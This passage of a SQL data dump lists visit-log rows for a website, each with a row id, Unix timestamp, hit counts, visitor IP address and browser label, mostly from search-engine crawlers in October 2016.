,'163.172.65.22','other'),(70507,1477368054,2,2,0,0,'141.8.183.25','other'),(70508,1477368394,1,1,0,0,'163.172.64.248','other'),(70509,1477369039,3,3,0,0,'130.193.50.34','other'),(70510,1477369382,1,1,0,0,'163.172.66.78','other'),(70511,1477369528,2,2,0,0,'130.193.51.19','other'),(70512,1477369555,4,4,0,0,'141.8.183.25','other'),(70513,1477369611,1,1,0,0,'163.172.65.229','other'),(70514,1477369641,1,0,1,0,'66.249.64.24',''),(70515,1477369787,1,0,1,0,'66.249.64.21',''),(70516,1477369811,1,0,1,0,'66.249.64.69',''),(70517,1477369995,1,1,0,0,'51.255.65.5','other'),(70518,1477370248,1,1,0,0,'163.172.66.15','other'),(70519,1477370634,1,1,0,0,'141.8.142.58','other'),(70520,1477370956,2,2,0,0,'130.193.50.34','other'),(70521,1477371035,1,1,0,0,'66.102.9.29','other'),(70522,1477371160,1,1,0,0,'66.249.64.24','chrome'),(70523,1477371303,1,1,0,0,'141.8.183.25','other'),(70524,1477371448,1,1,0,0,'164.132.161.31','other'),(70525,1477371461,1,1,0,0,'163.172.65.204','other'),(70526,1477371859,3,3,0,0,'130.193.50.34','other'),(70527,1477372298,4,4,0,0,'141.8.183.25','other'),(70528,1477372418,1,1,0,0,'163.172.66.34','other'),(70529,1477372733,1,1,0,0,'163.172.66.70','other'),(70530,1477372767,1,1,0,0,'51.255.65.90','other'),(70531,1477372839,3,3,0,0,'130.193.51.19','other'),(70532,1477372845,3,3,0,0,'130.193.50.34','other'),(70533,1477373116,1,0,1,0,'66.249.64.69',''),(70534,1477373329,2,2,0,0,'141.8.183.25','other'),(70535,1477373422,2,0,2,0,'66.249.64.21',''),(70536,1477374057,1,1,0,0,'163.172.66.3','other'),(70537,1477374190,1,1,0,0,'163.172.65.33','other'),(70538,1477374234,1,1,0,0,'141.8.142.67','other'),(70539,1477374585,5,5,0,0,'130.193.50.34','other'),(70540,1477374939,1,1,0,0,'46.200.56.32','chrome'),(70541,1477375169,1,1,0,0,'163.172.66.49','other'),(70542,1477375261,1,1,0,0,'164.132.161.48','other'),(70543,1477375383,1,0,1,0,'66.249.64.21',''),(70544,1477375476,1,1,0,0,'46.219.33.172','chrome'),(70545,1477375491,3,3,0,0,'130.193.50.34','other'),(70546,1477376021,1,1,0,0,'66.249.64.21','chrome'),(70547,1477376248,2,2,0,0,'141.8.183.25','other'),(70548,1477376339,1,1,0,0,'66.102.9.29','other'),(70549,1477376464,2,2,0,0,'130.193.50.34','other'),(70550,1477376897,1,1,0,0,'91.196.178.162','chrome'),(70551,1477377156,1,1,0,0,'103.215.53.157','firefox'),(70552,1477377187,1,1,0,0,'178.154.189.31','other'),(70553,1477377420,1,0,1,0,'66.249.64.27',''),(70554,1477377595,1,1,0,0,'141.8.142.62','other'),(70555,1477377711,1,1,0,0,'178.154.149.10','other'),(70556,1477377893,1,1,0,0,'130.193.50.34','other'),(70557,1477378033,2,2,0,0,'141.8.183.25','other'),(70558,1477378052,1,1,0,0,'51.255.65.97','other'),(70559,1477378177,1,0,1,0,'66.249.64.21',''),(70560,1477378701,1,1,0,0,'46.219.33.172','chrome'),(70561,1477378944,1,1,0,0,'163.172.65.221','other'),(70562,1477378969,4,4,0,0,'141.8.183.25','other'),(70563,1477378993,1,0,1,0,'66.249.64.24',''),(70564,1477379109,4,4,0,0,'130.193.50.34','other'),(70565,1477379300,1,1,0,0,'37.52.153.238','chrome'),(70566,1477379496,1,1,0,0,'164.132.161.74','other'),(70567,1477379746,1,1,0,0,'66.249.93.29','chrome'),(70568,1477379893,3,3,0,0,'141.8.183.25','other'),(70569,1477379951,1,1,0,0,'46.219.33.172','chrome'),(70570,1477380107,1,1,0,0,'66.249.64.24','chrome'),(70571,1477380462,6,6,0,0,'130.193.50.34','other'),(70572,1477380828,1,1,0,0,'93.73.234.193','firefox'),(70573,1477381004,2,2,0,0,'141.8.183.25','other'),(70574,1477381207,1,1,0,0,'163.172.64.184','other'),(70575,1477381266,1,1,0,0,'163.172.66.5','other'),(70576,1477381557,5,5,0,0,'130.193.50.34','other'),(70577,1477382351,1,1,0,0,'91.196.177.15','chrome'),(70578,1477382427,6,6,0,0,'141.8.183.25','other'),(70579,1477382441,1,1,0,0,'130.193.51.19','other'),(70580,1477382515,16,16,0,0,'130.193.50.34','other'),(70581,1477382517,1,1,0,0,'176.67.16.36','chrome'),(70582,1477382590,1,1,0,0,'164.132.161.93','other'),(70583,1477382735,1,1,0,0,'163.172.66.106','other'),(70584,1477382772,1,1,0,0,'164.132.161.95','other'),(70585,1477382886,1,1,0,0,'91.196.178.68','chrome'),(70586,1477383522,2,2,0,0,'141.8.183.25','other'),(70587,1477383631,4,4,0,0,'130.193.50.34','other'),(70588,1477383640,1,1,0,0,'164.132.161.6','other'),(70589,1477383726,2,2,0,0,'130.193.51.19','other'),(70590,1477383740,1,1,0,0,'163.172.65.206','other'),(70591,1477384291,1,1,0,0,'141.8.132.41','other'),(70592,1477384381,1,1,0,0,'93.158.152.51','other'),(70593,1477384474,1,1,0,0,'130.193.51.14','other'),(70594,1477384475,1,1,0,0,'130.193.50.6','other'),(70595,1477384527,2,2,0,0,'141.8.183.19','other'),(70596,1477384713,1,1,0,0,'141.8.142.67','other'),(70597,1477384818,2,2,0,0,'130.193.51.19','other'),(70598,1477384941,1,1,0,0,'178.154.189.31','other'),(70599,1477385087,5,5,0,0,'130.193.50.34','other'),(70600,1477385288,2,2,0,0,'141.8.183.25','other'),(70601,1477385488,1,1,0,0,'164.132.161.41','other'),(70602,1477385618,1,1,0,0,'164.132.161.94','other'),(70603,1477385747,2,2,0,0,'130.193.51.19','other'),(70604,1477385803,1,1,0,0,'194.44.21.52','chrome'),(70605,1477385971,1,1,0,0,'163.172.65.186','other'),(70606,1477386111,1,1,0,0,'46.219.248.214','chrome'),(70607,1477386305,1,1,0,0,'163.172.64.229','other'),(70608,1477386502,2,2,0,0,'130.193.50.34','other'),(70609,1477387090,1,1,0,0,'163.172.65.8','other'),(70610,1477387900,48,48,0,0,'62.221.75.114','chrome'),(70611,1477387983,1,1,0,0,'130.180.219.159','chrome'),(70612,1477388053,1,1,0,0,'51.255.65.14','other'),(70613,1477388269,1,1,0,0,'163.172.66.54','other'),(70614,1477388688,1,1,0,0,'194.187.217.53','chrome'),(70615,1477388907,1,1,0,0,'207.46.13.177','other'),(70616,1477389118,3,3,0,0,'130.193.50.34','other'),(70617,1477389471,1,1,0,0,'195.244.8.181','chrome'),(70618,1477389480,1,1,0,0,'164.132.161.73','other'),(70619,1477389533,1,1,0,0,'163.172.66.164','other'),(70620,1477389747,1,1,0,0,'141.8.183.25','other'),(70621,1477390856,1,1,0,0,'66.102.9.25','other'),(70622,1477390897,2,0,2,0,'66.249.64.21',''),(70623,1477391143,1,1,0,0,'91.196.178.161','firefox'),(70624,1477391326,1,0,1,0,'66.249.64.27',''),(70625,1477391674,1,1,0,0,'130.193.50.34','other'),(70626,1477392787,1,1,0,0,'141.8.183.25','other'),(70627,1477392796,1,1,0,0,'163.172.65.198','other'),(70628,1477393028,1,1,0,0,'94.179.115.179','chrome'),(70629,1477393750,1,1,0,0,'157.55.39.62','other'),(70630,1477393808,1,1,0,0,'94.179.87.218','firefox'),(70631,1477394148,1,1,0,0,'163.172.65.248','other'),(70632,1477394680,1,0,1,0,'66.249.64.79',''),(70633,1477394908,1,1,0,0,'51.255.65.89','other'),(70634,1477394974,1,1,0,0,'163.172.66.87','other'),(70635,1477395050,1,1,0,0,'130.193.50.34','other'),(70636,1477395489,2,2,0,0,'163.172.65.119','other'),(70637,1477395566,1,1,0,0,'94.179.209.79','firefox'),(70638,1477395673,4,4,0,0,'141.8.183.25','other'),(70639,1477395885,1,1,0,0,'163.172.66.157','other'),(70640,1477396435,1,1,0,0,'82.207.91.234','firefox'),(70641,1477396472,1,1,0,0,'130.193.50.34','other'),(70642,1477396648,1,1,0,0,'91.196.178.68','firefox'),(70643,1477397312,2,0,2,0,'66.249.64.21',''),(70644,1477397699,1,0,1,0,'66.249.64.27',''),(70645,1477398176,1,1,0,0,'163.172.64.183','other'),(70646,1477398219,2,2,0,0,'130.193.50.34','other'),(70647,1477398478,1,1,0,0,'66.249.64.24','chrome'),(70648,1477398660,1,1,0,0,'130.180.209.217','chrome'),(70649,1477398717,1,1,0,0,'164.132.161.10','other'),(70650,1477398983,1,1,0,0,'95.134.48.46','chrome'),(70651,1477399067,1,1,0,0,'163.172.65.250','other'),(70652,1477399288,1,1,0,0,'91.196.178.67','firefox'),(70653,1477399506,1,1,0,0,'164.132.161.11','other'),(70654,1477399954,2,2,0,0,'91.196.178.68','firefox'),(70655,1477401024,1,1,0,0,'176.108.106.4','chrome'),(70656,1477401110,2,0,2,0,'66.249.64.24',''),(70657,1477401280,1,1,0,0,'91.196.178.66','firefox'),(70658,1477401610,1,1,0,0,'130.193.50.34','other'),(70659,1477402074,1,1,0,0,'91.196.178.68','firefox'),(70660,1477402163,1,1,0,0,'91.196.178.163','chrome'),(70661,1477402355,1,1,0,0,'46.200.212.112','chrome'),(70662,1477402955,1,1,0,0,'94.179.102.65','firefox'),(70663,1477403212,1,1,0,0,'91.124.242.31','chrome'),(70664,1477403267,2,2,0,0,'130.193.50.34','other'),(70665,1477403558,1,1,0,0,'94.180.149.98','msie'),(70666,1477403621,1,1,0,0,'91.196.177.46','chrome'),(70667,1477404467,1,1,0,0,'130.193.50.34','other'),(70668,1477404691,1,1,0,0,'40.77.167.15','other'),(70669,1477405261,1,1,0,0,'66.102.9.25','other'),(70670,1477405331,1,1,0,0,'178.93.148.16','chrome'),(70671,1477405710,1,1,0,0,'91.196.178.163','chrome'),(70672,1477406108,2,0,2,0,'66.249.64.21',''),(70673,1477406295,1,1,0,0,'141.8.183.25','other'),(70674,1477406342,1,1,0,0,'66.249.64.21','chrome'),(70675,1477408014,4,4,0,0,'130.193.50.34','other'),(70676,1477409679,1,1,0,0,'91.196.178.164','other'),(70677,1477409846,1,0,1,0,'66.249.64.24',''),(70678,1477409900,1,0,1,0,'66.249.64.74',''),(70679,1477410636,1,1,0,0,'91.196.177.11','other'),(70680,1477410843,1,1,0,0,'94.179.209.79','firefox'),(70681,1477413399,1,0,1,0,'66.249.64.21',''),(70682,1477413835,1,1,0,0,'91.196.178.38','firefox'),(70683,1477414052,1,1,0,0,'66.102.9.29','chrome'),(70684,1477414065,1,1,0,0,'91.196.178.164','other'),(70685,1477414704,1,1,0,0,'91.196.178.70','firefox'),(70686,1477414841,1,0,1,0,'66.249.64.21',''),(70687,1477414912,1,0,1,0,'66.249.64.79',''),(70688,1477415858,1,0,1,0,'66.249.64.27',''),(70689,1477415893,1,1,0,0,'130.193.50.34','other'),(70690,1477417638,1,1,0,0,'130.193.50.34','other'),(70691,1477419458,1,0,1,0,'66.249.64.79',''),(70692,1477419658,1,1,0,0,'66.102.9.25','other'),(70693,1477419711,1,0,1,0,'66.249.64.59',''),(70694,1477419965,1,1,0,0,'91.196.178.35','chrome'),(70695,1477421077,2,2,0,0,'130.193.50.34','other'),(70696,1477421851,1,0,1,0,'66.249.64.61',''),(70697,1477422599,1,0,1,0,'68.180.230.220',''),(70698,1477422751,1,0,1,0,'66.249.64.24',''),(70699,1477423209,1,1,0,0,'141.8.183.25','other'),(70700,1477423402,1,1,0,0,'92.113.157.157','chrome'),(70701,1477423680,1,0,1,0,'66.249.64.21',''),(70702,1477423716,1,0,1,0,'66.249.64.24',''),(70703,1477424915,1,1,0,0,'66.249.64.24','chrome'),(70704,1477425401,1,1,0,0,'66.249.64.74','chrome'),(70705,1477426684,2,0,2,0,'66.249.64.24',''),(70706,1477428982,1,1,0,0,'5.248.135.132','other'),(70707,1477429260,1,1,0,0,'66.249.64.24','chrome'),(70708,1477429875,1,1,0,0,'141.8.183.25','other'),(70709,1477432950,1,1,0,0,'130.193.50.34','other'),(70710,1477432997,1,1,0,0,'157.55.39.62','other'),(70711,1477434082,1,1,0,0,'66.102.9.27','other'),(70712,1477434360,1,1,0,0,'66.249.64.27','chrome'),(70713,1477434728,1,1,0,0,'130.193.50.34','other'),(70714,1477435470,2,2,0,0,'141.8.183.25','other'),(70715,1477435856,3,3,0,0,'130.193.51.19','other'),(70716,1477436009,1,1,0,0,'141.8.142.61','other'),(70717,1477436170,1,1,0,0,'130.193.51.74','other'),(70718,1477436173,1,1,0,0,'141.8.132.10','other'),(70719,1477436225,1,1,0,0,'141.8.142.58','other'),(70720,1477436279,1,1,0,0,'141.8.142.67','other'),(70721,1477436552,1,1,0,0,'157.55.39.62','other'),(70722,1477436607,1,1,0,0,'46.242.91.219','opera'),(70723,1477436982,1,1,0,0,'130.193.50.34','other'),(70724,1477437263,1,1,0,0,'141.8.183.25','other'),(70725,1477437995,2,2,0,0,'130.193.50.34','other'),(70726,1477438658,2,0,2,0,'66.249.64.21',''),(70727,1477438812,1,0,1,0,'66.249.64.27',''),(70728,1477439002,2,0,2,0,'66.249.64.24',''),(70729,1477439096,1,1,0,0,'130.193.50.34','other'),(70730,1477439450,3,3,0,0,'141.8.183.25','other'),(70731,1477439818,1,1,0,0,'66.249.64.27','chrome'),(70732,1477440364,1,1,0,0,'141.8.183.25','other'),(70733,1477440679,2,2,0,0,'130.193.50.34','other'),(70734,1477441229,1,1,0,0,'66.249.64.24','chrome'),(70735,1477441592,1,0,1,0,'66.249.64.27',''),(70736,1477441688,1,1,0,0,'141.8.183.25','other'),(70737,1477442147,2,2,0,0,'130.193.50.34','other'),(70738,1477443269,2,2,0,0,'141.8.183.25','other'),(70739,1477443283,1,1,0,0,'40.77.167.73','other'),(70740,1477444358,2,2,0,0,'141.8.183.25','other'),(70741,1477444829,1,1,0,0,'40.77.167.73','other'),(70742,1477445173,1,1,0,0,'141.8.142.85','other'),(70743,1477446249,1,1,0,0,'130.193.50.34','other'),(70744,1477446554,1,0,1,0,'66.249.64.27',''),(70745,1477448474,1,1,0,0,'66.102.9.25','other'),(70746,1477449388,1,1,0,0,'130.193.50.34','other'),(70747,1477451772,1,1,0,0,'130.193.50.34','other'),(70748,1477453310,2,2,0,0,'141.8.183.25','other'),(70749,1477453551,1,1,0,0,'157.55.39.62','other'),(70750,1477453744,1,0,1,0,'66.249.64.24',''),(70751,1477453864,2,2,0,0,'130.193.51.19','other'),(70752,1477454218,2,2,0,0,'141.8.183.25','other'),(70753,1477454286,1,1,0,0,'130.193.50.34','other'),(70754,1477454566,1,1,0,0,'5.255.253.67','other'),(70755,1477454648,1,1,0,0,'178.154.149.10','other'),(70756,1477456511,1,1,0,0,'130.193.50.38','other'),(70757,1477456669,1,1,0,0,'141.8.132.30','other'),(70758,1477456800,1,1,0,0,'130.193.50.34','other'),(70759,1477456927,1,1,0,0,'141.8.183.25','other'),(70760,1477456931,1,1,0,0,'194.37.248.11','chrome'),(70761,1477457498,1,0,1,0,'66.249.64.27',''),(70762,1477458443,1,1,0,0,'141.8.142.58','other'),(70763,1477459363,1,1,0,0,'141.8.142.85','other'),(70764,1477459658,1,1,0,0,'141.8.183.25','other'),(70765,1477459935,1,1,0,0,'66.249.64.24','chrome'),(70766,1477460206,1,1,0,0,'130.193.50.34','other'),(70767,1477460641,2,2,0,0,'91.196.178.68','chrome'),(70768,1477461169,1,1,0,0,'91.196.178.67','firefox'),(70769,1477461199,1,1,0,0,'194.37.248.11','chrome'),(70770,1477461573,1,1,0,0,'91.196.178.68','chrome'),(70771,1477461861,1,1,0,0,'91.196.178.72','chrome'),(70772,1477462134,1,1,0,0,'194.37.248.11','chrome'),(70773,1477462532,1,0,1,0,'66.249.64.27',''),(70774,1477462604,1,1,0,0,'91.196.177.110','chrome'),(70775,1477462674,1,1,0,0,'37.52.156.199','firefox'),(70776,1477462857,1,1,0,0,'66.102.9.29','other'),(70777,1477462992,1,0,1,0,'66.249.64.21',''),(70778,1477463651,3,3,0,0,'130.193.50.34','other'),(70779,1477463993,1,1,0,0,'207.46.13.177','other'),(70780,1477465707,1,1,0,0,'91.196.178.65','firefox'),(70781,1477467149,1,1,0,0,'130.193.50.34','other'),(70782,1477467290,1,1,0,0,'159.224.114.248','chrome'),(70783,1477467649,1,1,0,0,'130.193.51.19','other'),(70784,1477467769,1,1,0,0,'91.196.178.169','chrome'),(70785,1477467796,1,1,0,0,'141.8.142.58','other'),(70786,1477468223,2,2,0,0,'130.193.50.34','other'),(70787,1477468786,1,1,0,0,'91.196.178.70','chrome'),(70788,1477469639,1,1,0,0,'141.8.183.25','other'),(70789,1477469932,1,1,0,0,'94.179.42.141','firefox'),(70790,1477470037,1,1,0,0,'91.196.178.38','firefox'),(70791,1477470743,2,2,0,0,'130.193.50.34','other'),(70792,1477471651,1,1,0,0,'91.196.178.67','firefox'),(70793,1477471682,1,1,0,0,'66.249.93.13','chrome'),(70794,1477471810,2,2,0,0,'130.193.50.34','other'),(70795,1477471864,1,1,0,0,'66.102.9.25','other'),(70796,1477473574,1,1,0,0,'141.8.142.58','other'),(70797,1477474218,1,1,0,0,'130.180.220.188','firefox'),(70798,1477474425,1,1,0,0,'66.102.9.29','other'),(70799,1477474429,1,1,0,0,'66.249.93.13','chrome'),(70800,1477475137,1,1,0,0,'141.8.183.25','other'),(70801,1477475174,1,1,0,0,'91.196.178.67','firefox'),(70802,1477475345,2,2,0,0,'130.193.50.34','other'),(70803,1477475355,1,1,0,0,'91.196.178.163','firefox'),(70804,1477477685,3,0,3,0,'68.180.230.220',''),(70805,1477478031,1,1,0,0,'194.37.248.11','chrome'),(70806,1477478461,1,1,0,0,'66.249.64.24','chrome'),(70807,1477478647,1,1,0,0,'157.55.39.62','other'),(70808,1477479466,1,1,0,0,'141.8.142.58','other'),(70809,1477479578,1,1,0,0,'130.193.50.34','other'),(70810,1477479808,1,1,0,0,'130.193.51.19','other'),(70811,1477481500,1,1,0,0,'180.76.15.151','other'),(70812,1477481585,2,2,0,0,'130.193.50.34','other'),(70813,1477481623,3,3,0,0,'130.193.51.19','other'),(70814,1477481658,3,3,0,0,'141.8.183.25','other'),(70815,1477481670,1,1,0,0,'141.8.142.61','other'),(70816,1477481827,1,1,0,0,'178.140.239.174','chrome'),(70817,1477482617,1,1,0,0,'91.196.178.135','firefox'),(70818,1477482646,1,1,0,0,'180.76.15.152','other'),(70819,1477484509,1,0,1,0,'66.249.64.27',''),(70820,1477485243,1,1,0,0,'141.8.142.58','other'),(70821,1477485590,1,1,0,0,'31.43.2.53','chrome'),(70822,1477485645,1,1,0,0,'91.196.178.68','chrome'),(70823,1477485996,1,1,0,0,'91.196.178.67','firefox'),(70824,1477486209,1,1,0,0,'91.196.178.71','firefox'),(70825,1477486547,1,1,0,0,'91.196.178.68','chrome'),(70826,1477486888,1,1,0,0,'66.102.9.25','other'),(70827,1477486980,1,1,0,0,'91.196.178.67','firefox'),(70828,1477487290,1,1,0,0,'130.193.50.34','other'),(70829,1477487364,1,1,0,0,'141.8.183.25','other'),(70830,1477488160,1,1,0,0,'91.196.178.164','chrome'),(70831,1477488626,1,1,0,0,'141.8.183.25','other'),(70832,1477489224,1,1,0,0,'207.46.13.177','other'),(70833,1477492347,1,1,0,0,'109.173.57.240','chrome'),(70834,1477492424,2,2,0,0,'130.193.51.19','other'),(70835,1477492727,1,1,0,0,'82.207.49.114','chrome'),(70836,1477492908,1,1,0,0,'178.93.148.188','chrome'),(70837,1477493880,1,1,0,0,'91.196.177.15','chrome'),(70838,1477493956,1,1,0,0,'40.77.167.73','other'),(70839,1477495109,1,1,0,0,'66.102.9.25','other'),(70840,1477496100,1,1,0,0,'91.196.178.97','firefox'),(70841,1477496653,1,1,0,0,'91.196.178.65','chrome'),(70842,1477500519,1,1,0,0,'37.55.226.128','chrome'),(70843,1477500711,1,0,1,0,'66.249.64.21',''),(70844,1477501047,1,1,0,0,'66.102.9.29','chrome'),(70845,1477501154,1,1,0,0,'94.179.80.130','chrome'),(70846,1477501366,1,1,0,0,'66.102.9.27','other'),(70847,1477501423,1,1,0,0,'94.179.209.79','firefox'),(70848,1477501953,1,1,0,0,'141.8.142.61','other'),(70849,1477502637,1,1,0,0,'141.8.183.25','other'),(70850,1477503196,1,1,0,0,'5.255.253.36','other'),(70851,1477503234,1,1,0,0,'91.196.178.65','firefox'),(70852,1477503698,1,0,1,0,'66.249.64.79',''),(70853,1477503843,1,0,1,0,'66.249.64.24',''),(70854,1477504706,1,1,0,0,'157.55.39.62','other'),(70855,1477504799,1,1,0,0,'91.209.11.175','chrome'),(70856,1477504804,1,1,0,0,'109.63.145.167','chrome'),(70857,1477505228,1,1,0,0,'141.8.142.58','other'),(70858,1477505403,1,1,0,0,'141.8.183.25','other'),(70859,1477506899,1,1,0,0,'141.8.183.25','other'),(70860,1477507040,1,1,0,0,'130.193.51.19','other'),(70861,1477508728,1,1,0,0,'46.201.36.250','chrome'),(70862,1477509338,1,1,0,0,'130.193.50.34','other'),(70863,1477510365,1,1,0,0,'40.77.167.73','other'),(70864,1477510511,1,1,0,0,'141.8.183.25','other'),(70865,1477510814,1,1,0,0,'37.54.86.185','chrome'),(70866,1477511398,1,1,0,0,'130.193.50.34','other'),(70867,1477512387,1,1,0,0,'130.193.51.19','other'),(70868,1477513213,1,1,0,0,'94.179.209.79','firefox'),(70869,1477515925,1,1,0,0,'130.193.50.34','other'),(70870,1477516558,1,1,0,0,'66.249.69.60','chrome'),(70871,1477516618,1,1,0,0,'5.255.253.30','other'),(70872,1477517245,1,1,0,0,'93.158.152.75','other'),(70873,1477517259,1,1,0,0,'66.249.75.44','chrome'),(70874,1477521352,1,1,0,0,'207.46.13.66','other'),(70875,1477522455,1,1,0,0,'174.129.237.157','other'),(70876,1477522640,1,1,0,0,'130.193.37.7','other'),(70877,1477522974,1,1,0,0,'66.102.9.27','other'),(70878,1477523918,1,1,0,0,'141.8.183.25','other'),(70879,1477523921,1,1,0,0,'141.8.132.41','other'),(70880,1477525586,1,1,0,0,'130.193.50.32','other'),(70881,1477525590,1,1,0,0,'141.8.132.52','other'),(70882,1477525780,1,0,1,0,'66.249.75.179',''),(70883,1477528166,1,1,0,0,'40.77.167.73','other'),(70884,1477528578,1,1,0,0,'130.193.50.4','other'),(70885,1477528607,1,1,0,0,'178.154.189.37','other'),(70886,1477529320,1,1,0,0,'141.8.183.14','other'),(70887,1477529442,1,1,0,0,'130.193.51.45','other'),(70888,1477530285,1,1,0,0,'180.76.15.5','other'),(70889,1477531581,1,0,1,0,'68.180.230.220',''),(70890,1477531583,2,2,0,0,'141.8.183.25','other'),(70891,1477533014,1,1,0,0,'157.55.39.62','other'),(70892,1477534522,1,1,0,0,'141.8.183.25','other'),(70893,1477537355,1,1,0,0,'130.193.50.34','other'),(70894,1477539861,1,1,0,0,'207.46.13.87','other'),(70895,1477540091,1,1,0,0,'130.193.50.34','other'),(70896,1477541248,1,1,0,0,'141.8.183.25','other'),(70897,1477541321,1,1,0,0,'130.193.51.19','other'),(70898,1477542925,1,1,0,0,'141.8.183.25','other'),(70899,1477544009,1,1,0,0,'157.55.39.62','other'),(70900,1477544635,1,1,0,0,'66.102.9.27','other'),(70901,1477546418,1,1,0,0,'5.228.67.29','msie'),(70902,1477546687,1,1,0,0,'141.8.183.25','other'),(70903,1477548460,1,1,0,0,'91.196.178.68','chrome'),(70904,1477549419,1,1,0,0,'91.196.178.68','chrome'),(70905,1477550015,1,1,0,0,'193.194.127.198','chrome'),(70906,1477550365,1,1,0,0,'174.129.237.157','other'),(70907,1477550800,2,2,0,0,'40.77.167.73','other'),(70908,1477553290,1,1,0,0,'91.196.178.162','chrome'),(70909,1477553935,1,1,0,0,'130.193.51.19','other'),(70910,1477554184,1,1,0,0,'91.196.178.72','chrome'),(70911,1477555115,1,1,0,0,'91.196.178.97','chrome'),(70912,1477555583,1,1,0,0,'178.93.59.84','chrome'),(70913,1477556015,1,1,0,0,'91.196.178.71','firefox'),(70914,1477557725,1,1,0,0,'66.249.75.187','chrome'),(70915,1477559758,1,1,0,0,'130.193.50.34','other'),(70916,1477563014,1,1,0,0,'130.193.51.19','other'),(70917,1477563877,1,1,0,0,'91.196.178.129','firefox'),(70918,1477564218,1,1,0,0,'91.196.178.71','firefox'),(70919,1477564907,1,1,0,0,'94.179.73.113','firefox'),(70920,1477564947,1,1,0,0,'130.193.50.34','other'),(70921,1477566178,1,1,0,0,'66.102.9.29','other'),(70922,1477568362,1,1,0,0,'91.196.178.67','firefox'),(70923,1477569549,1,1,0,0,'91.196.177.15','chrome'),(70924,1477569862,1,1,0,0,'176.193.104.68','msie'),(70925,1477570460,1,1,0,0,'130.193.50.34','other'),(70926,1477570750,1,1,0,0,'91.196.178.67','firefox'),(70927,1477571218,1,1,0,0,'130.193.37.27','other'),(70928,1477571656,2,2,0,0,'91.196.178.68','firefox'),(70929,1477573479,1,1,0,0,'91.196.177.15','chrome'),(70930,1477573658,1,1,0,0,'95.132.115.145','firefox'),(70931,1477573794,1,1,0,0,'82.207.91.234','firefox'),(70932,1477574014,1,0,1,0,'68.180.229.190',''),(70933,1477575303,1,1,0,0,'178.93.56.9','chrome'),(70934,1477575506,1,1,0,0,'54.226.28.164','other'),(70935,1477576504,1,0,1,0,'66.249.75.179',''),(70936,1477577007,1,1,0,0,'5.199.234.243','opera'),(70937,1477577736,1,0,1,0,'66.249.69.155',''),(70938,1477578106,1,0,1,0,'66.249.75.187',''),(70939,1477578214,1,1,0,0,'5.199.234.243','opera'),(70940,1477578576,1,1,0,0,'141.8.183.25','other'),(70941,1477579721,1,1,0,0,'180.76.15.27','other'),(70942,1477580619,1,0,1,0,'66.249.75.187',''),(70943,1477582623,1,1,0,0,'91.196.178.164','other'),(70944,1477584569,1,1,0,0,'23.92.212.2','chrome'),(70945,1477586375,1,1,0,0,'141.8.142.58','other'),(70946,1477587002,1,1,0,0,'130.193.50.34','other'),(70947,1477587670,1,1,0,0,'66.102.9.27','other'),(70948,1477588854,1,1,0,0,'176.9.77.72','other'),(70949,1477591110,2,0,2,0,'66.249.75.187',''),(70950,1477591217,1,0,1,0,'66.249.69.149',''),(70951,1477591276,1,0,1,0,'68.180.230.220',''),(70952,1477591348,1,1,0,0,'66.102.9.27','other'),(70953,1477591396,1,1,0,0,'91.196.178.167','firefox'),(70954,1477592244,1,1,0,0,'37.115.113.62','firefox'),(70955,1477592426,1,1,0,0,'180.163.1.46','msie'),(70956,1477592481,1,1,0,0,'101.226.33.227','msie'),(70957,1477592574,1,1,0,0,'140.207.185.109','msie'),(70958,1477592829,1,0,1,0,'66.249.75.187',''),(70959,1477593284,1,1,0,0,'101.226.66.180','chrome'),(70960,1477593340,1,1,0,0,'178.92.8.53','chrome'),(70961,1477593378,1,0,1,0,'66.249.75.183',''),(70962,1477594236,1,1,0,0,'163.172.65.66','other'),(70963,1477594978,1,1,0,0,'51.255.65.51','other'),(70964,1477595351,1,1,0,0,'141.8.183.25','other'),(70965,1477595559,1,1,0,0,'163.172.66.90','other'),(70966,1477596896,1,1,0,0,'8.37.232.29','other'),(70967,1477597185,1,1,0,0,'94.179.28.252','firefox'),(70968,1477597271,1,1,0,0,'51.255.65.57','other'),(70969,1477597464,1,1,0,0,'163.172.65.194','other'),(70970,1477597487,1,1,0,0,'51.255.65.92','other'),(70971,1477598098,1,1,0,0,'51.255.65.61','other'),(70972,1477598185,1,1,0,0,'163.172.65.30','other'),(70973,1477598797,1,1,0,0,'51.255.65.8','other'),(70974,1477598848,1,1,0,0,'51.255.65.41','other'),(70975,1477599275,1,1,0,0,'51.255.65.16','other'),(70976,1477599776,1,1,0,0,'51.255.65.53','other'),(70977,1477600470,1,0,1,0,'68.180.230.220',''),(70978,1477600500,1,1,0,0,'164.132.161.13','other'),(70979,1477600607,1,1,0,0,'163.172.66.10','other'),(70980,1477601012,1,1,0,0,'164.132.161.70','other'),(70981,1477601377,1,1,0,0,'163.172.66.183','other'),(70982,1477601949,1,1,0,0,'163.172.66.146','other'),(70983,1477602273,1,1,0,0,'130.193.50.34','other'),(70984,1477602912,1,1,0,0,'163.172.65.43','other'),(70985,1477603216,1,1,0,0,'141.8.183.25','other'),(70986,1477603249,1,1,0,0,'163.172.66.51','other'),(70987,1477603269,1,1,0,0,'163.172.65.131','other'),(70988,1477604210,1,1,0,0,'164.132.161.53','other'),(70989,1477604985,1,1,0,0,'51.255.65.74','other'),(70990,1477605419,1,1,0,0,'163.172.66.168','other'),(70991,1477605530,1,1,0,0,'141.8.183.25','other'),(70992,1477605554,1,1,0,0,'130.193.50.34','other'),(70993,1477605555,1,1,0,0,'164.132.161.58','other'),(70994,1477605557,1,1,0,0,'130.193.51.19','other'),(70995,1477605828,1,1,0,0,'51.255.65.40','other'),(70996,1477606090,1,1,0,0,'163.172.66.73','other'),(70997,1477606102,1,1,0,0,'163.172.65.28','other'),(70998,1477607248,1,1,0,0,'163.172.65.232','other'),(70999,1477607260,2,2,0,0,'163.172.66.98','other'),(71000,1477607339,1,1,0,0,'51.255.65.97','other'),(71001,1477607453,1,1,0,0,'164.132.161.18','other'),(71002,1477607762,1,1,0,0,'163.172.64.180','other'),(71003,1477607862,1,1,0,0,'180.76.15.152','other'),(71004,1477607864,1,1,0,0,'180.76.15.32','other'),(71005,1477608066,1,1,0,0,'163.172.65.45','other'),(71006,1477608713,1,1,0,0,'163.172.66.171','other'),(71007,1477608815,1,1,0,0,'51.255.65.4','other'),(71008,1477609260,1,1,0,0,'163.172.66.64','other'),(71009,1477609523,1,1,0,0,'141.8.183.25','other'),(71010,1477609646,1,1,0,0,'163.172.64.227','other'),(71011,1477609705,1,1,0,0,'164.132.161.57','other'),(71012,1477610246,1,1,0,0,'51.255.65.87','other'),(71013,1477610343,1,1,0,0,'163.172.66.71','other'),(71014,1477611473,1,1,0,0,'164.132.161.14','other'),(71015,1477611781,1,1,0,0,'51.255.65.95','other'),(71016,1477612123,1